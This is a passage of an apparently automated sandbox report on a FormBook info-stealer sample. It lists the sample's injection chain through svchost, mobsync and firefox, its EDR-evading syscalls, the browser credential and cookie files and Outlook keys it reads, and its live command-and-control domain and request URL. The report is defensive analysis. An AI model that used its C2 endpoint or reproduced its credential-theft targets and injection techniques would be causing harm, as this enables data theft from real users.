                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\mobsync.exeThread register set: target process: 8180Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\mobsync.exeThread APC queued: target process: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D3C008Jump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009587B1 LogonUserW,0_2_009587B1
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00903B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00903B3A
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_009048D7
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00964C27 mouse_event,0_2_00964C27
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Gz2FxKx2cM.exe"Jump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00957CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00957CAF
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0095874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0095874B
                Source: Gz2FxKx2cM.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Gz2FxKx2cM.exe, HFOpYoEqWJkRNv.exe, 00000004.00000000.1600202529.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675350449.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675643954.0000000000DD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: HFOpYoEqWJkRNv.exe, 00000004.00000000.1600202529.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675350449.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675643954.0000000000DD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: HFOpYoEqWJkRNv.exe, 00000004.00000000.1600202529.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675350449.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675643954.0000000000DD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: HFOpYoEqWJkRNv.exe, 00000004.00000000.1600202529.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000004.00000002.2675350449.0000000001530000.00000002.00000001.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675643954.0000000000DD0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0092862B cpuid 0_2_0092862B
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00934E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00934E87
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00941E06 GetUserNameW,0_2_00941E06
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00933F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00933F3A
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009049A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Gz2FxKx2cM.exeBinary or memory string: WIN_81
                Source: Gz2FxKx2cM.exeBinary or memory string: WIN_XP
                Source: Gz2FxKx2cM.exeBinary or memory string: WIN_XPe
                Source: Gz2FxKx2cM.exeBinary or memory string: WIN_VISTA
                Source: Gz2FxKx2cM.exeBinary or memory string: WIN_7
                Source: Gz2FxKx2cM.exeBinary or memory string: WIN_8
                Source: Gz2FxKx2cM.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00976283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00976283
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_00976747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00976747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager1
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		3
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588319 Sample: Gz2FxKx2cM.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.izmirescortg.xyz 2->28 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected FormBook 2->36 38 Binary is likely a compiled AutoIt script file 2->38 42 2 other signatures 2->42 10 Gz2FxKx2cM.exe 2 2->10         started        signatures3 40 Performs DNS queries to domains with low reputation 28->40 process4 signatures5 54 Binary is likely a compiled AutoIt script file 10->54 56 Writes to foreign memory regions 10->56 58 Maps a DLL or memory area into another process 10->58 60 Switches to a custom stack to bypass stack traces 10->60 13 svchost.exe 10->13         started        process6 signatures7 62 Maps a DLL or memory area into another process 13->62 16 HFOpYoEqWJkRNv.exe 13->16 injected process8 signatures9 32 Found direct / indirect Syscall (likely to bypass EDR) 16->32 19 mobsync.exe 13 16->19         started        process10 signatures11 44 Tries to steal Mail credentials (via file / registry access) 19->44 46 Tries to harvest and steal browser information (history, passwords, etc) 19->46 48 Modifies the context of a thread in another process (thread injection) 19->48 50 3 other signatures 19->50 22 HFOpYoEqWJkRNv.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 30 www.izmirescortg.xyz 104.21.36.62, 49709, 80 CLOUDFLARENETUS United States 22->30 52 Found direct / indirect Syscall (likely to bypass EDR) 22->52 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Gz2FxKx2cM.exe71%ReversingLabsWin32.Trojan.AutoitInject
                Gz2FxKx2cM.exe54%VirustotalBrowse
                Gz2FxKx2cM.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.izmirescortg.xyz/lnl7/?_Lgdx=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==&Vf4hC=XvLPHfTX0%Avira URL Cloudsafe
                http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.izmirescortg.xyz
                		104.21.36.62
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.izmirescortg.xyz/lnl7/?_Lgdx=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==&Vf4hC=XvLPHfTXfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://duckduckgo.com/chrome_newtabmobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://www.ecosia.org/newtab/mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.litespeedtech.com/error-pagemobsync.exe, 00000007.00000002.1921955822.0000000004DF4000.00000004.10000000.00040000.00000000.sdmp, HFOpYoEqWJkRNv.exe, 00000008.00000002.2675961964.0000000002B34000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2673702912.0000000015024000.00000004.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 00000007.00000003.1864941771.000000000756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.21.36.62
                                    		www.izmirescortg.xyzUnited States
                                    		13335CLOUDFLARENETUSfalse

                                    General Information

                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1588319
                                    Start date and time:2025-01-10 23:56:26 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:11
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:2
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Gz2FxKx2cM.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:f3a50ff1e7a5fbde11e1f103161b01284e78d8bad05116052b6bfda6e9cac55a.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@1/1
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:
                                    • Successful, ratio: 85%
                                    • Number of executed functions: 50
                                    • Number of non-executed functions: 277
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    104.21.36.62YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        www.izmirescortg.xyzM7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.186.192
                                        YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                        • 104.21.36.62
                                        Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.186.192
                                        BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.186.192
                                        IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                        • 172.67.186.192
                                        file.exeGet hashmaliciousFormBookBrowse
                                        • 172.67.186.192
                                        Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                        • 104.21.36.62

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUScOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                        • 104.16.184.241
                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        • 104.21.16.1
                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                        • 104.21.32.1
                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                        • 104.21.48.1
                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 104.21.80.1
                                        Setup.exeGet hashmaliciousLummaCBrowse
                                        • 188.114.96.3
                                        xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                        • 104.21.112.1
                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 104.21.96.1
                                        Setup.exeGet hashmaliciousUnknownBrowse
                                        • 104.21.80.1

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\10O4645j

                                        Download File
                                        Process:C:\Windows\SysWOW64\mobsync.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                        Category:dropped
                                        Size (bytes):196608
                                        Entropy (8bit):1.1209886597424439
                                        Encrypted:false
                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                        MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                        SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                        SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
